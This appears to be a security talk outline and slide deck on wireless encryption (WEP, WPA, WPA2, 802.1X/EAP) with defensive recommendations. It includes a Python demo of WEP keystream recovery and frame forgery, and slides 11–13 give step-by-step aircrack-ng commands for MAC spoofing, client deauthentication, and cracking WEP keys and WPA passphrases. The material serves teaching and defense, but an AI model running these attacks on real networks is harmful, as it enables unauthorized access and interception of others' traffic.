Network Security and Ethical Hacking

  • Intro slide: Jason Maynard is an Infrastructure Architect for one of the top 10 insurance companies in Canada. He holds a number of certifications including CCIP, GSEC and GCFW, and has recently passed the VCP and his Windows 2008 MCTS upgrade exam. Tonight Jason will be showing us how to use some Linux-based tools to detect common wireless vulnerabilities, and then discuss what steps we can take to help minimize them.
  • Discuss WEP, WPA, and WPA2.
  • WEP is designed to provide the same level of security as a wired LAN. Wired LANs are inherently harder to attack than WLANs because they are partly protected by their physical structure: some or all of the network sits inside a building that can be guarded against unauthorized access. WLANs run over radio waves, have no such physical boundary, and are therefore more exposed to eavesdropping and tampering. WEP aims to close that gap by encrypting data over the air so that it is protected in transit from one endpoint to another. However, WEP has been shown to be far weaker than originally believed: it uses RC4 with a 24-bit initialization vector (IV) that repeats quickly, an unkeyed CRC-32 integrity check, and a key schedule that leaks key bytes, so both keystream recovery and full key recovery are practical. WEP operates at the two lowest layers of the OSI model, the physical and data link layers, and therefore does not offer end-to-end security.
  • WPA is designed to work with existing Wi-Fi products that already support WEP (i.e. as a firmware or software upgrade to existing hardware), but it includes two improvements over WEP. First, improved data encryption through the Temporal Key Integrity Protocol (TKIP): TKIP still uses RC4, but mixes a fresh per-packet key from the session key and a packet sequence counter, and adds a message integrity check (Michael) so that tampered or replayed frames are rejected. Second, user authentication, which is generally missing in WEP, through the Extensible Authentication Protocol (EAP). Without EAP, access control on a WEP network is usually done by filtering on each computer's hardware MAC address, which is easy to sniff and spoof. EAP is a framework for authentication methods; the methods used on WLANs (EAP-TLS, PEAP) run inside a TLS tunnel authenticated by a server certificate, so only authorized users with valid credentials can join the network. Note that WPA was an interim standard, designed to be replaced by IEEE 802.11i (marketed as WPA2) on its completion.
  • WPA2 provides enterprise and consumer Wi-Fi users with a high level of assurance that only authorized users can access their wireless networks. It implements the NIST-approved AES algorithm (in CCMP mode, available in FIPS 140-2 validated implementations) together with 802.1X-based authentication. [Adapted from Wi-Fi.org] There are two versions: WPA2-Personal, which protects against unauthorized access with a pre-shared key (PSK) derived from a passphrase, and WPA2-Enterprise, which verifies each user against an authentication server (typically RADIUS). WPA2 is backward compatible with WPA.
  • MAC authentication is hard to manage in medium to large organizations, and it is trivially bypassed by spoofing an authorized address. Disabling SSID broadcast does not prevent an attacker from discovering the SSID; it still appears in the probe and association frames sent by legitimate clients.
  • Command line tools used in the demos:
    - ifconfig: interface configuration tool, similar to but more powerful than ipconfig
    - iwconfig: wireless interface configuration tool
    - macchanger: changes the MAC address of the card (spoofing)
    - airmon-ng: puts the card into monitor mode, which lets it capture every 802.11 frame on a channel rather than only frames addressed to it (the 802.11 analogue of promiscuous mode, but a distinct driver mode)
    - airodump-ng: captures and collects packets
    - aireplay-ng: used to deauthenticate clients and to inject or replay traffic
    - aircrack-ng: used to crack WEP keys and WPA/WPA2 pre-shared keys
  • Remember: a single layer of security will NOT secure your infrastructure forever; given enough time, any encryption algorithm can theoretically be broken. Use a layered security approach. With layered security you will stop the majority of attackers from penetrating your network, and the remaining attackers will be discouraged as they continually hit another layer that must be compromised.
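The following Python script is an added example, not code from the talk or from the aircrack-ng project. It demonstrates one concrete reason WEP is broken that the note above only states: because the 24-bit IV is sent in the clear and is reused, and the ICV is an unkeyed CRC-32, an attacker who knows the plaintext of one frame (the fixed LLC/SNAP header in front of an ARP packet is the usual source) recovers the RC4 keystream for that IV, can decrypt any other frame that reused it, and can forge new frames the AP will accept, all without ever learning the key. The 40-bit root key, the IV, the MAC and IP addresses and the frame contents are constructed for the demo. The statistical key-recovery attacks aircrack-ng actually runs (FMS/PTW) are a separate weakness and are not implemented here.

```python
import struct
import zlib
from typing import Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). WEP seeds it with IV || root key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: unkeyed CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """One frame body: IV (3 bytes, in clear) || RC4(IV||key, data||ICV)."""
    assert len(iv) == 3 and len(root_key) in (5, 13)
    return iv + rc4(iv + root_key, plaintext + icv(plaintext))


def wep_decrypt(root_key: bytes, frame: bytes) -> bytes:
    """What the AP does: decrypt, verify the ICV, otherwise reject the frame."""
    iv, body = frame[:3], frame[3:]
    data = rc4(iv + root_key, body)
    plaintext, received_icv = data[:-4], data[-4:]
    if received_icv != icv(plaintext):
        raise ValueError("ICV mismatch: frame rejected")
    return plaintext


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- attacker side: root_key is never used below this line ---

def recover_keystream(frame: bytes, known_plaintext: bytes) -> Tuple[bytes, bytes]:
    """Known plaintext XOR ciphertext = keystream for this IV (plus the 4 ICV bytes,
    which the attacker can compute because CRC-32 is unkeyed)."""
    iv, body = frame[:3], frame[3:]
    return iv, xor(body, known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Decrypt any other frame that reused the same IV, without the key."""
    if frame[:3] != iv:
        raise ValueError("different IV, keystream does not apply")
    body = frame[3:]
    if len(body) > len(keystream):
        raise ValueError("frame longer than the recovered keystream")
    return xor(body, keystream)[:-4]          # strip the ICV


def forge_frame(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Build a frame with a valid ICV that the AP will accept as genuine."""
    data = plaintext + icv(plaintext)
    if len(data) > len(keystream):
        raise ValueError("not enough keystream for a frame of this size")
    return iv + xor(data, keystream)


# Constructed sample data (not a real capture). The LLC/SNAP header preceding
# an ARP payload on 802.11 is fixed, which is the usual known plaintext.
SNAP_ARP = bytes.fromhex("aaaa030000000806")
ROOT_KEY = bytes.fromhex("0102030405")   # 40-bit WEP key, known only to AP/clients
IV = bytes.fromhex("000001")             # 24-bit IV space: ~2^12 frames until a
                                         # random IV repeats (birthday bound)


def demo() -> dict:
    # ARP request: hw type, proto, lengths, opcode, sender MAC/IP, target MAC/IP
    known_plain = SNAP_ARP + bytes.fromhex(
        "0001080006040001" "001122334455" "c0a80164" "000000000000" "c0a80101")
    secret_plain = SNAP_ARP + b"secret"          # attacker does not know this one
    frame_known = wep_encrypt(ROOT_KEY, IV, known_plain)
    frame_secret = wep_encrypt(ROOT_KEY, IV, secret_plain)   # same IV reused

    iv, ks = recover_keystream(frame_known, known_plain)
    return {
        "recovered": decrypt_with_keystream(frame_secret, iv, ks),
        "forged_accepted": wep_decrypt(ROOT_KEY, forge_frame(iv, ks, SNAP_ARP + b"injected")),
    }


if __name__ == "__main__":
    print(demo())
```

The recovered keystream is only as long as the known plaintext plus four bytes, which is why real attacks (and aireplay-ng's fragmentation and chop-chop modes) work to extend it; the forged frame is accepted purely because CRC-32 is not a keyed MAC, the defect that TKIP's Michael and CCMP's CBC-MAC were introduced to fix.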
  • The supplicant is usually software on a client device such as a laptop, the authenticator is a wired Ethernet switch or wireless access point, and the authentication server is generally a RADIUS server backed by a user database. The authenticator acts like a security guard for the protected network: the supplicant (client device) is not allowed through the authenticator to the protected side of the network until its identity has been verified by the authentication server.
  • Acronyms:
    - EAP: Extensible Authentication Protocol
    - PEAP: Protected EAP
    - GTC: Generic Token Card
    - TLS: Transport Layer Security
  • PEAP authenticates the server to the client with a server certificate and builds a TLS tunnel; the client is then authenticated inside that tunnel with an inner EAP type such as EAP-MSCHAPv2 or EAP-GTC. EAP-MSCHAPv2 wraps Microsoft's Challenge Handshake Authentication Protocol v2 inside EAP and authenticates with Active Directory credentials. EAP-GTC defines an EAP envelope to carry one-time passwords generated by token cards such as RSA SecurID; it is a good fit for companies that use two-factor authentication to avoid common password compromises. Note: it is critical to use the same version of PEAP on clients and servers. PEAPv0/EAP-MSCHAPv2 is supported by the 802.1X supplicant built into Windows XP SP2 and Windows 2000 SP4. PEAPv1/EAP-GTC requires another 802.1X supplicant, such as the one installed with Cisco's Aironet Client Utility. These supplicants are mutually exclusive: installing a PEAPv1 client replaces any existing PEAPv0 client. Caveat: clients must be configured to validate the server certificate (trusted CA and expected server name); otherwise a rogue access point can present its own certificate and collect MSCHAPv2 challenge/response pairs for offline cracking.
  • EAP-TLS is the most secure method and the most expensive to deploy: it uses mutual certificate authentication between client and server. The keys it derives can then protect data with AES (CCMP), TKIP or dynamic WEP, depending on what the WLAN is configured to use. EAP-TLS is a good fit in WLANs where clients already have digital certificates, or where high security needs justify investing in a PKI to manage those certificates.

    1. Network Security and Ethical Hacking - Wireless
       Jason Maynard, CCDA, CCIP, CCNP, GSEC, GCFW, Infrastructure Architect
    2. Is it secure?
       It really depends on the methods used to secure it.
    3. Encryption and authentication methods
    4. WEP: short for Wired Equivalent Privacy, a security protocol for wireless local area networks (WLANs) defined in the original IEEE 802.11 standard.
    5. WPA: short for Wi-Fi Protected Access, a Wi-Fi Alliance standard designed to improve on the security features of WEP.
    6. WPA2: short for Wi-Fi Protected Access 2, the follow-on security method to WPA for wireless networks that provides stronger data protection and network access control. Based on the IEEE 802.11i standard.
    7. MAC authentication is easy to sniff and spoof, and the SSID can still be obtained by sniffing the network even when it is not broadcast.
    8. A couple of demos:
       • WEP
       • WPA
    9. Items needed:
       • USB key with BackTrack 3 (Linux distro used for ethical hacking)
       • DWA-642 PCMCIA card (Atheros chipset, uses the madwifi-ng driver)
       • Access point running WEP, then reconfigured for WPA
       • 2 client laptops, one Linux and one Windows, connecting to the AP
    10. Command line tools:
       • ifconfig
       • iwconfig
       • macchanger
       • airmon-ng
       • airodump-ng
       • aireplay-ng
       • aircrack-ng
    11. Open a couple of terminals
       • Type "iwconfig" to identify the wireless cards
       • Type "ifconfig" to determine which cards are up
       • Type "airmon-ng stop wifi0" and "airmon-ng stop ath0" to make sure the cards are not already in monitor mode
       • Type "ifconfig ath0 down" and "ifconfig wifi0 down" to make sure the interfaces are down
    12. Preparing the card and finding the target
       • Type "macchanger --mac 00:11:22:33:44:55 wifi0" to change the MAC address
       • Type "airmon-ng start wifi0" to put the card in monitor mode (with madwifi-ng the monitor interface is ath0)
       • Type "airodump-ng ath0", find an AP running WEP or WPA, note its channel and BSSID (the AP's MAC address, not the SSID), then stop the scan
       WEP cracking
       • Type "airodump-ng -w wep -c <channel> --bssid <AP BSSID> ath0" (captures packets to and from the AP; -w is an output prefix, so the capture lands in wep-01.cap)
       • New terminal
       • Type "aireplay-ng -1 0 -a <AP BSSID> -h 00:11:22:33:44:55 ath0" (fake authentication with the AP using the spoofed MAC, so the AP accepts injected frames)
    13. WEP cracking, continued
       • Go to another terminal
       • Type "aireplay-ng -2 -p 0841 -b <AP BSSID> -h 00:11:22:33:44:55 ath0" (interactive packet replay, which generates the traffic and fresh IVs the cracking step needs)
       • Go to another terminal
       • Type "aircrack-ng wep*.cap"
       WPA cracking
       • Type "airodump-ng -w wpa -c <channel> --bssid <AP BSSID> ath0" (captures the four-way handshake between a client and the AP into wpa-01.cap)
       • Type "aireplay-ng -0 5 -a <AP BSSID> ath0" (deauthentication: forces connected clients to reconnect so that a handshake is captured)
       • Type "aircrack-ng -0 -x2 wpa*.cap -w /pentest/wireless/aircrack-ng/test/password.lst" (offline dictionary attack against the captured handshake)
    14. So what do I do to protect my network and wireless users?
    15. Use WPA2 with 802.1X
    16. WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and 802.1X-based authentication.
    17. 802.1X provides port-based authentication, which involves communications between a supplicant, an authenticator, and an authentication server.
    18. 802.1X: the most secure methods
       • EAP-PEAP
       • EAP-TLS
    19. EAP-PEAP: uses a server certificate and MSCHAPv2.
    20. EAP-TLS: one of the most secure methods, uses client and server certificates. More difficult to manage.
    21. (image slide, no text)
    22. Supporting products:
       • FreeRADIUS and OpenSSL
       • Microsoft RADIUS with Group Policy and Certificate Services
       • Cisco ACS server with local authentication, AD or NDS
    23. Supporting product links:
       • BackTrack: http://www.remote-exploit.org/backtrack_download.html
       • FreeRADIUS and OpenSSL: http://wiki.freeradius.org and http://www.openssl.org
       • Cisco ACS: http://www.cisco.com/en/US/products/sw/secursw/ps2086
       • Microsoft: http://www.microsoft.com/technet/security/prodtech/windowsserver2003/pkiwire/swlan.mspx?mfr=true and http://technet.microsoft.com/en-us/magazine/cc162468.aspx
    24. Questions?
